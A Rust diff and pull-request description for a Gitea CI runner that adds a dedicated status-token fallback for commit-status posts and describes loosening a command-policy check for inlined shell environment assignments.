+    /// GITEA_TOKEN). Per-job `github.token` often lacks statuses scope on private repos.
+    status_fallback: Option<Arc<SingleStatusWriter>>,
 }
 
 impl<C: GiteaRunnerClient, P: PolicyPlanner> TaskWorker<C, P> {
@@ -48,6 +51,7 @@ impl<C: GiteaRunnerClient, P: PolicyPlanner> TaskWorker<C, P> {
             instance_url: instance_url.into(),
             checkout_dir: checkout_dir.into(),
             legacy: None,
+            status_fallback: None,
         }
     }
 
@@ -55,6 +59,13 @@ impl<C: GiteaRunnerClient, P: PolicyPlanner> TaskWorker<C, P> {
     /// the native protocol result during migration.
     pub fn with_legacy_mirror(mut self, writer: Arc<SingleStatusWriter>, context: String) -> Self {
         self.legacy = Some((writer, context));
+        self
+    }
+
+    /// Attach a fallback writer for native commit-status posts when the per-job
+    /// token is missing or returns HTTP 401.
+    pub fn with_status_fallback(mut self, writer: Arc<SingleStatusWriter>) -> Self {
+        self.status_fallback = Some(writer);
         self
     }
 
@@ -74,18 +85,35 @@ impl<C: GiteaRunnerClient, P: PolicyPlanner> TaskWorker<C, P> {
         ) else {
             return;
         };
-        let Some(token) = workflow_payload::job_token(task) else {
-            log::warn!(
-                "native commit status skipped: no per-job token on task {}",
-                task.id
-            );
-            return;
-        };
         let mut parts = full.splitn(2, '/');
         let (Some(owner), Some(repo)) = (parts.next(), parts.next()) else {
             return;
         };
         let context = workflow_payload::commit_status_context(task, workflow);
+
+        // Prefer the dedicated status token when configured: per-job github.token
+        // can authenticate checkout but still return HTTP 401 on /statuses for private repos.
+        if let Some(fallback) = &self.status_fallback {
+            match fallback
+                .post(owner, repo, &sha, state, &context, desc)
+                .await
+            {
+                Ok(()) => return,
+                Err(e) => log::warn!(
+                    "native commit status post via runner status token failed for {owner}/{repo}@{sha}: {e}"
+                ),
+            }
+        }
+
+        let Some(token) = workflow_payload::job_token(task) else {
+            if self.status_fallback.is_none() {
+                log::warn!(
+                    "native commit status skipped: no per-job token on task {}",
+                    task.id
+                );
+            }
+            return;
+        };
         let writer = SingleStatusWriter::new(&self.instance_url, token);
         if let Err(e) = writer.post(owner, repo, &sha, state, &context, desc).await {
             log::warn!("native commit status post failed for {owner}/{repo}@{sha}: {e}");


### PR DESCRIPTION
## Summary

Fixes two native runner infra issues blocking green `native-ci / build (push)` on private repos:

1. **HTTP 401 on commit status** — per-job `github.token` can checkout but lacks `/statuses` scope. Runner now prefers `RUNNER_STATUS_TOKEN` / `GITEA_TOKEN` for native commit-status posts (job token remains fallback).
2. **Policy reject `RUSTDOC=$(rustup`** — Gitea inlines step `env:` into `run:` commands. Policy now strips leading shell assignments (including `$(subshell)` forms) before allowlist checks.

## Deploy

Already deployed on bigbox: binary rebuilt from this branch, `RUNNER_STATUS_TOKEN` added to all three runner env files, services restarted.

## Test plan

- [x] `cargo test -p terraphim_gitea_runner` (33 tests)
- [ ] `workflow_dispatch` on terraphim-agents — verify no 401 / policy reject in runner logs

Refs terraphim/terraphim-ai#2464 (Gitea)